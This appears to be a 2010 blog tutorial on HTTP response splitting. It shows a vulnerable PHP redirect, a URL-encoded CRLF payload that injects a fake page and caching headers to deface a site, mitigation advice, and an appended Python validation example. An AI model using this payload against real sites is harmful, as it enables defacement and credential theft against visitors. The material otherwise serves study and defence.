Saturday, 13 March 2010

HTTP Response Splitting

How to inject malicious HTML into a server's HTTP response headers to deface the site (allowing for credential theft etc.), and cache the page so the defacement persists on the victim's computer.

HTTP Response Splitting is a fairly new type of web application security vulnerability. The idea behind it is this: you find a website that takes user-submitted data and writes it into an HTTP header. An example of this is a Location: redirect. Here's the PHP code that takes a website and redirects you to it.

http://site.com/redirect.php?page=http://www.google.com
CODE :
<?php
// Vulnerable: the user-supplied 'page' value is written straight into the Location header.
header("Location: " . $_GET['page']);
?>


As you can see, the 'page' variable is passed to the Location header to redirect the user. Here's what the request and reply headers look like:

Request:
CODE :
GET /index.php?page=http://www.google.com HTTP/1.1\r\n
Host: site.com\r\n
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n
Accept-Language: en-us,en;q=0.5\r\n
Accept-Encoding: gzip,deflate\r\n
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
\r\n


Reply: (302 Redirect)
CODE :
HTTP/1.1 302 Found\r\n
Date: Tue, 02 Oct 2007 1:40:00 GMT\r\n
Server: Apache/0.0.0 (Windows) PHP/0.0.0\r\n
Location: http://www.google.com\r\n
(the user's fake headers would appear here)
Keep-Alive: timeout=15, max=100\r\n
Connection: Keep-Alive\r\n
Transfer-Encoding: chunked\r\n
Content-Type: text/html\r\n
\r\n


Now the browser follows the redirect and requests the URL it was sent to (google.com):
CODE :
GET / HTTP/1.1
Host: www.google.com
Accept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive


The server will respond with a 200 OK response and show you the requested document, Google.com. Hopefully you noticed what's at the end of each line:
\r\n
This is also written as:
CR LF, and
%0d %0a (URL-encoded)

So, you should now understand how headers can be faked. Basically, if you inject a CR LF into the header, you can append headers of your own, and you have your attack. Now, what can be accomplished with this? Well, you can rewrite the page, allowing for XSS and HTML injection, and you can even tell the browser to cache your 'defaced' page by setting one of:
Last-Modified:
Cache-Control: or
Pragma:
to a date ahead of the current one.

So, let's inject our own headers to rewrite the page and tell the browser to cache it.

Our Injection:
CODE :
\r\n
Content-Type: text/html\r\n
HTTP/1.1 200 OK\r\n
Content-Type: text/html\r\n
Last-Modified: Tue, 5 Oct 2007 12:00:00 GMT\r\n
\r\n
<html><h1>Defaced!</html>



Here's what the request and reply headers look like:

Request:
CODE :
GET /index.php?page=%0d%0aContent-Type:%20text/html%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Tue,%205%20Oct%202007%2012:00:00%20GMT%0d%0a%0d%0a%3Chtml%3E%3Ch1%3EDefaced!%3C/html%3E HTTP/1.1\r\n
Host: site.com\r\n
Accept:text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n
Accept-Language: en-us,en;q=0.5\r\n
Accept-Encoding: gzip,deflate\r\n
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
\r\n


Response: (302 Found)
CODE :
HTTP/1.1 302 Found
(normal headers here)
Date: Tue, 02 Oct 2007 1:40:00 GMT
Server: Apache/0.0.0 (Windows) PHP/0.0.0
Location:
Content-Type: text/html
HTTP/1.1 200 OK
(our injected response starts here)
Content-Type: text/html
Last-Modified: Tue, 5 Oct 2007 12:00:00 GMT

<html><h1>Defaced!</html>

(the body above is what gets shown as the redirected page; the server's remaining headers land after it)
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html


As you can see in the example above, the server sends its normal 302 response, then our injected code is placed where the redirect would be, which causes it to be shown on the page, allowing for the payload of our choice. And as a bonus, it gets cached until the 5th of October ;)
So up until that day, provided they don't clear their cache, they will see the defaced page.

Now, to protect yourself against this attack, be sure to sanitize input against:
CR LF
\r\n and
%0d%0a
and any other encodings of these characters before passing them into the HTTP headers.
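As an added example (not the post's own code), here is the post's redirect rewritten in Python with that mitigation applied: the parameter is percent-decoded until stable, refused if it contains any control character, and restricted to an allow-list of destination hosts. The unchecked version is kept beside it so the split response can be compared with the refused one. The allow-list and host names are assumptions made for this example.

```python
"""Hardened version of the post's redirect: added example, not the post's own code.
Refuses any 'page' value that could carry CR/LF into the Location header and
only redirects to expected hosts."""
import re
from typing import Optional
from urllib.parse import unquote, urlsplit

# Hypothetical allow-list of redirect destinations, chosen for this example.
ALLOWED_HOSTS = {"www.google.com", "site.com"}
# CR, LF and every other ASCII control character: none may reach a header.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")

def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable, so double-encoded %250d%250a is seen as CRLF too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def safe_location(page: str) -> Optional[str]:
    """Return a Location value for `page`, or None if the request must be refused."""
    decoded = fully_decode(page)
    if not decoded.isascii() or CONTROL_CHARS.search(decoded):
        return None  # a raw or encoded CRLF here is what splits the response
    parts = urlsplit(decoded)
    if parts.scheme not in ("http", "https") or parts.hostname not in ALLOWED_HOSTS:
        return None  # closes the open redirect as well
    return decoded

def vulnerable_redirect(page: str) -> bytes:
    """The post's behaviour: the parameter goes into the header unchecked."""
    return f"HTTP/1.1 302 Found\r\nLocation: {page}\r\n\r\n".encode("latin-1")

def hardened_redirect(page: str) -> bytes:
    """Same redirect, but answered with a 400 when the value fails validation."""
    location = safe_location(page)
    if location is None:
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return f"HTTP/1.1 302 Found\r\nLocation: {location}\r\nContent-Length: 0\r\n\r\n".encode("ascii")

# Constructed inputs: the benign URL from the post, and a shortened form of the
# post's payload as the web server hands it to the script (percent-decoded once).
BENIGN = "http://www.google.com"
INJECTED = unquote("%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0a%0d%0a"
                   "%3Chtml%3E%3Ch1%3EDefaced!%3C/html%3E")
```

PHP 5.1.2 and later refuse a header() value that contains a newline, which blocks the exact request shown above, but the validation is still needed in other frameworks and it also closes the open redirect.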
